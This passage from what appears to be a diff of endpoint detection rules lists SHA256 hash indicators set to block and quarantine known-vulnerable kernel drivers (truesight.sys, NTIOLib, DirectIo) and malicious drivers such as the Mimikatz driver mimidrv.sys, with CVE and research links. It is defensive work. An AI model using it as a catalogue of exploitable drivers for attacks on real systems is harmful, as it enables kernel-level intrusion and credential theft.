Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2394c20d-ec39-5646-9fea-99514be0732e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968527Z", + "creation_date": 
"2026-03-23T11:45:29.968529Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968535Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5", + "comment": "Vulnerable Kernel Driver (aka HpPortIox64.sys) [https://www.loldrivers.io/drivers/13637210-2e1c-45a4-9f76-fe38c3c34264/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "23a4f77c-53aa-5169-91b3-f79a6564af0b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155614Z", + "creation_date": "2026-03-23T11:45:31.155616Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155622Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8c9058ca48a1ce381fe40f4dea553cf200ad3c146c16f83301ddcb8887b7269f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "23ac62d0-92b9-5f19-a1b0-1a51ecebcea7", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160535Z", + "creation_date": "2026-03-23T11:45:31.160537Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160542Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "138f9f8dbff592c83bd409fce1e6ca83890deead587205f94a656549d202a00c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "23b1a236-8b95-5747-aa05-29c2ab3dfb8e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477254Z", + "creation_date": "2026-03-23T11:45:31.477258Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.477269Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7086cedfb56414413595dc2ddd595fcced21d1de5412406add7b9f2ad7951951", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "23b4b8ca-9d2d-55b6-a44a-b906e25c3b74", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824515Z", + "creation_date": "2026-03-23T11:45:31.824518Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824527Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "17564c465975cfded515991b4185606094eafaff3df48ea38fca6a27ddee4623", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "23b97a34-40c6-503f-af8c-0df284d4fb34", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826188Z", + "creation_date": "2026-03-23T11:45:30.826190Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826196Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "21c51f1f1c7de816763f1c95757815bd9fc4b0c4ddb48b31ba1fb6f75c49734f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "23bb2d82-3dac-57b0-9683-c5c5b7eb64b8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976353Z", + "creation_date": "2026-03-23T11:45:29.976355Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976361Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "6839fcae985774427c65fe38e773aa96ec451a412caa5354ad9e2b9b54ffe6c1", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "23bfd105-acdd-5028-95b9-6dd26ee6eb9a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480028Z", + "creation_date": "2026-03-23T11:45:30.480030Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480035Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c53b5f071de2bbc03387451052ab81bae9b8ec0a6e075c970600f791157b0b25", + "comment": "Vulnerable Kernel Driver (aka gpcidrv64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "23c2a3eb-c7fb-5c68-948d-79d2092bfaff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835145Z", + "creation_date": "2026-03-23T11:45:30.835148Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835158Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6cde9ccc57c594d23b20847c2ad76611a74ef7c682f28dcd20272b1ce802a1e7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "23d66f56-4796-557f-ac04-d52082a8c83a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615238Z", + "creation_date": "2026-03-23T11:45:29.615240Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615245Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7af3585ca7c2dd65032fa48759a0124db2c5bbca5fc8caf8bb8f61fa5085149d", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, 
NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "23e2fbf1-51fc-5f47-a686-b1fe34e654e3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816728Z", + "creation_date": "2026-03-23T11:45:31.816730Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816739Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "05f6a7781481eb0ab9b893a1d5090ac23cb4738b449902f1f65467a560c0eafa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "23f3cac5-909c-5d10-a408-709b4fade607", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977392Z", + 
"creation_date": "2026-03-23T11:45:29.977394Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977400Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c7079033659ac9459b3b7ab2510805832db2e2a70fe9beb1a6e13c1f51890d88", + "comment": "Vulnerable Kernel Driver (aka ProtectS.sys) [https://www.loldrivers.io/drivers/99668140-a8f6-48f8-86d1-cf3bf693600c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "23f5fea7-cb0c-5db5-91ea-a91eeb5c57d7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967049Z", + "creation_date": "2026-03-23T11:45:29.967068Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967085Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d166b6ffd164dbea53f0f588a979f4c5f1f2a1793fc10cda84a4530b7b22fd0c", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"23f67de7-eb03-5fe7-a246-3f38dc0d7f65", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156231Z", + "creation_date": "2026-03-23T11:45:31.156233Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156242Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bafb67136ec3e5cb200f3ffe103b736f75995a2f6b87b384aa9dfa3501d9ec08", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "23fd0a5d-eb2d-56e1-9939-6afff5cf468d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469457Z", + "creation_date": "2026-03-23T11:45:30.469460Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.469469Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2bff494de18fb32985901a06a931dab92eda052172cf7c942cdd6da944b7a4ba", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "240f7d32-baa7-5bb5-afec-7d3a5ccf266f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474914Z", + "creation_date": "2026-03-23T11:45:31.474920Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474932Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "35a8ceb54744e733a31b662d964f5cab22ea63ce77286ce141f9c2563bcf1209", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "24104255-627b-5f13-9530-5fd8719b5a3c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152159Z", + "creation_date": "2026-03-23T11:45:31.152162Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152170Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "22c56a56f07d687685a3072c12dacccb3dad0c61c6148ce328727dd28f6da58c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "242517f2-7f2e-5810-831a-b960d4218d1c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459893Z", + "creation_date": "2026-03-23T11:45:30.459897Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459906Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "07c0239c548fdabcb18ac3b54001edd0f8abffd8285e39662d7632a26456d58b", + "comment": "Vulnerable Kernel Driver (aka VBoxMouseNT.sys) [https://www.loldrivers.io/drivers/ecabc507-2cc7-4011-89ab-7d9d659e6f88/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "24274ad6-70fd-5107-afee-8170fe3395cb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615932Z", + "creation_date": "2026-03-23T11:45:29.615934Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615940Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c0fc1c1c1ff39ea9a695996482ab31cb65c74aaf9f20cba21e9ff34ef054a008", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "242e4963-cde5-5fe9-be28-17e303346cf1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983456Z", + "creation_date": "2026-03-23T11:45:29.983458Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983464Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "146d77e80ca70ea5cb17bfc9a5cea92334f809cbdc87a51c2d10b8579a4b9c88", + "comment": "Vulnerable Kernel Driver (aka t.sys) [https://www.loldrivers.io/drivers/65660363-0080-4432-abd9-64368dac0283/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "244668f1-96aa-513e-a858-ca3e60ae86c8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980220Z", + "creation_date": "2026-03-23T11:45:29.980222Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980227Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9fa120bda98633e30480d8475c9ac6637470c4ca7c63763560bf869138091b01", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "2457a838-4956-519b-aef5-48d77aafa717", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826525Z", + "creation_date": "2026-03-23T11:45:31.826527Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826533Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a6c578ca720621ec6981160912e70e13a390f349d593135587fef9cfc34517ad", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "245864bd-b5e7-5dd2-8dad-ac3870829711", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495097Z", + "creation_date": "2026-03-23T11:45:31.495099Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495104Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d5888073352e24be4718b0f28b1a4fde32ec3c0ff29bbda20213043bb4a3c6a6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "245b7c28-bae4-53a0-845f-0278000edf88", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821290Z", + "creation_date": "2026-03-23T11:45:31.821293Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821301Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "73f34dad3342777c826f23a3e36384ec093395a9d1d2b28c1bf0a82a9bedd167", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2467e068-43d7-5717-9275-31caf05ba5ee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
